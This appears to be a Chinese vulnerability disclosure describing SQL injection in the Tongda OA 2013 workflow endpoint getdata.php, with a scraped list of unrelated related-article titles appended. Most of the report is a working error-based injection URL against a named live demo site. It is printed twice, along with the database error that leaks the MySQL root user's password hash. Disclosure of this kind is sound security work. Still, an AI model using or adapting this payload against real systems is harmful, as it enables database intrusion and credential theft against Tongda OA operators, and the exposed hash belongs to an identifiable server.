### 简要描述:

dd

### 详细说明:

http://www.tongda2000.com/oa/group/

试用登录

http://www.day900.com/

注入点:

http://www.day900.com/general/workflow/list/getdata.php?TYPE=2&RUN_ID=&RUN_NAME=&FLOW_ID=all&TIME_OUT_FLAG=all&_search=false&nd=1427034012264&rows=10&page=1&sidx=PRCS_TIME&sord=,(select%201%20from%20(select%20count(*),concat((select%20concat(host,user,password)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23

返回:

请联系管理员

错误#1062: Duplicate entry 'localhostroot*91AF99F23C3D4ED85140D100433725DFA52BECEE1' for key 'group_key'

SQL语句: SELECT FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,FLOW_RUN.RUN_NAME,FLOW_RUN.BEGIN_USER,FLOW_RUN.END_TIME, FLOW_RUN_PRCS.ID AS PRCS_KEY_ID,FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN_PRCS.FLOW_PRCS,FLOW_RUN_PRCS.COMMENT,FLOW_RUN_PRCS.OP_FLAG, FLOW_RUN_PRCS.PRCS_FLAG,FLOW_RUN_PRCS.TIME_OUT_FLAG,FLOW_RUN_PRCS.PRCS_TIME, FLOW_RUN_PRCS.CREATE_TIME,FLOW_RUN_PRCS.DELIVER_TIME,FLOW_RUN_PRCS.TIME_OUT FROM FLOW_RUN_PRCS LEFT JOIN FLOW_RUN ON FLOW_RUN.RUN_ID = FLOW_RUN_PRCS.RUN_ID WHERE FLOW_RUN.DEL_FLAG='0' AND FLOW_RUN_PRCS.PRCS_FLAG = '2' AND FLOW_RUN_PRCS.CHILD_RUN='0' AND FLOW_RUN_PRCS.USER_ID='ghq' ORDER BY PRCS_TIME ,(select 1 from (select count(*),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# LIMIT 0, 10

文件:/general/workflow/list/getdata.php

### 漏洞证明:

注入点:

http://www.day900.com/general/workflow/list/getdata.php?TYPE=2&RUN_ID=&RUN_NAME=&FLOW_ID=all&TIME_OUT_FLAG=all&_search=false&nd=1427034012264&rows=10&page=1&sidx=PRCS_TIME&sord=,(select%201%20from%20(select%20count(*),concat((select%20concat(host,user,password)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23

返回:

请联系管理员

错误#1062: Duplicate entry 'localhostroot*91AF99F23C3D4ED85140D100433725DFA52BECEE1' for key 'group_key'

SQL语句: SELECT FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,FLOW_RUN.RUN_NAME,FLOW_RUN.BEGIN_USER,FLOW_RUN.END_TIME, FLOW_RUN_PRCS.ID AS PRCS_KEY_ID,FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN_PRCS.FLOW_PRCS,FLOW_RUN_PRCS.COMMENT,FLOW_RUN_PRCS.OP_FLAG, FLOW_RUN_PRCS.PRCS_FLAG,FLOW_RUN_PRCS.TIME_OUT_FLAG,FLOW_RUN_PRCS.PRCS_TIME, FLOW_RUN_PRCS.CREATE_TIME,FLOW_RUN_PRCS.DELIVER_TIME,FLOW_RUN_PRCS.TIME_OUT FROM FLOW_RUN_PRCS LEFT JOIN FLOW_RUN ON FLOW_RUN.RUN_ID = FLOW_RUN_PRCS.RUN_ID WHERE FLOW_RUN.DEL_FLAG='0' AND FLOW_RUN_PRCS.PRCS_FLAG = '2' AND FLOW_RUN_PRCS.CHILD_RUN='0' AND FLOW_RUN_PRCS.USER_ID='ghq' ORDER BY PRCS_TIME ,(select 1 from (select count(*),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# LIMIT 0, 10

文件:/general/workflow/list/getdata.php

通达oa 2013 php解密,通达OA2013集团版SQL注入+root相关推荐

  1. 通达+oa+php+文件+乱,通达OA 任意文件上传+文件包含导致RCE

    0x00 漏洞描述 ispirit/im/upload.php存在绕过登录(任意文件上传漏洞),结合gateway.php处存在的文件包含漏洞,最终导致getshell,或者直接利用日志文件写入she ...

  2. 通达oa精灵的下载步骤_通达oa精灵app下载|通达oa精灵2018官方版下载_v2.12_9ht安卓下载...

    通达oa精灵手机版2018是一款便捷.高效的办公协助软件.能够让员工之间沟通更便捷,查询信息更方便,数据统计更高效,让您办公更轻松!新版的通达OA精灵2018使用更加流畅,消息的推送更加敏捷,再一次加 ...

  3. oracle防止sql注入proc,解密:Oracle怎么防SQL注入

    昨天我们说了怎么绕过waf进行sql注入,今天我们继续这个话题,说说Oracle数据库本身在防sql注入方面做了哪些工作. Oracle从8i开始PL/SQL中涌现出了大量SQL注入漏洞,直至11.2 ...

  4. 通达+oa+php+文件+乱,通达OA任意文件删除/OA未授权访问+任意文件上传RCE漏洞复现...

    0x00 简介 通达OA采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠.数据存取集中控制,避免了数据泄漏的可能.提供数据备份工具,保护系统数据安全.多级 ...

  5. 通达oa 修改服务器端口,通达oa云服务器设置

    通达oa云服务器设置 内容精选 换一换 专属云中的专属资源池与公共资源池物理隔离,如果您的业务对安全合规性有较高要求,可以选择将裸金属服务器创建在专属云中.创建专属裸金属服务器有两种方式:在专属云控制 ...

  6. 通达oa系统服务器端设置,通达OA系统secWall保密方案之一:服务器端部署

    通达OA系统secWall保密方案之一:服务器端部署 万华数据 一. secwall软件部署 在通达OA环境中安装好secWall企业版后,做如下配置,使整个OA系统的数据都在secWall企业版的保 ...

  7. 通达OA 尝试一下进行通达OA的培训

    通达OA基于本身操作简便.管理便捷的优势被广大用户所喜爱,拥有大量的正式用户.对OA应用的多了,也会产生各种个性化的需求.近来,有些朋友咨询是否可以进行通达OA的培训,这里先列出一个计划表,有这方面需 ...

  8. 通达OA系统排名?通达OA办公系统怎么选?什么是用户口碑最好的通达OA系统?

    提到OA选型,难免不会提到通达,通达OA怎么样?通达OA有哪些优缺点?通达OA用户口碑怎么样? 想了解这些信息,您应该到选型宝,B2B的大众点评,看看用户对通达OA产品的实名点评. 关于通达OA,以下 ...

  9. 通达oa mysql 登陆_通达oa 怎么进入mysql?

    qq_笑_17 在使用通达OA系统时很多用户需要借助Mysql网页式管理工具进入后台数据库去查看数据,进行一些相应的操作.但是大多数时候用户安装完该工具后都是直接进入后台数据库,这样是很不安全.那如何 ...

最新文章

  1. Pycharm中实现查找和替换
  2. cisco 2960 VLAN MAC_华为网络初级工程师快速掌握基于MAC地址的VLAN划分实用收藏
  3. [再寄小读者之数学篇](2014-11-26 幂等矩阵的一个充分条件)
  4. Java是类型安全的语言,而C++是非类型安全的?【解释】
  5. vue获取当前月最后一天_只争朝夕,不负韶华——站在2020年第一天,回望2019最后的两个月...
  6. 服务器系统架构的评估,系统架构师:性能评估
  7. scrapy-实现下一页请求, scrapy.Request
  8. IT管理员喜欢OpManager的十大原因
  9. Linux C编程学习之路
  10. android-倒计时工具类
  11. linux消息队列默认长度,Linux 消息队列长度处理
  12. 告别动态规划,连刷40道动规算法题,我总结了动规的套路
  13. Pandas:分组级的运算和转换--transform和apply
  14. dropping incoming packet
  15. 《AMNet: Deep Atrous Multiscale Stereo Disparity Estimation Networks》
  16. 我在阿里三年的运营经都在这儿了
  17. 【电商项目实战】个人资料(详细篇)
  18. 复旦校长官宣:复旦大学即将推出“不升也能留”计划!
  19. 一条简单 SQL 执行耗时超 1000ms,问题解决全过程!
  20. CSDN蒋涛:从产品经理到通证设计师

热门文章

  1. JS手机浏览器判断(转)
  2. 狠!删库跑路!一行代码蒸发10亿人民币!
  3. 泛微OA的Linux系统之App服务器设置
  4. 微信接口php oa,你必须了解OA与微信结合的几种方式
  5. 基于MiniSTM32的mpu6050学习笔记(一)
  6. 两数之差的补码等于被减数的补码与减数相反数的补码。_二进制的原码、反码、补码...
  7. Windows10永久去掉预览窗格和详细信息窗格
  8. iOS开发 关于调用私有函数 监测安装app 卸载 app
  9. 一款使用MarkDown描述的自动化神器Gauge
  10. linux bash:command,学习使用Linux Command line(Git Bash)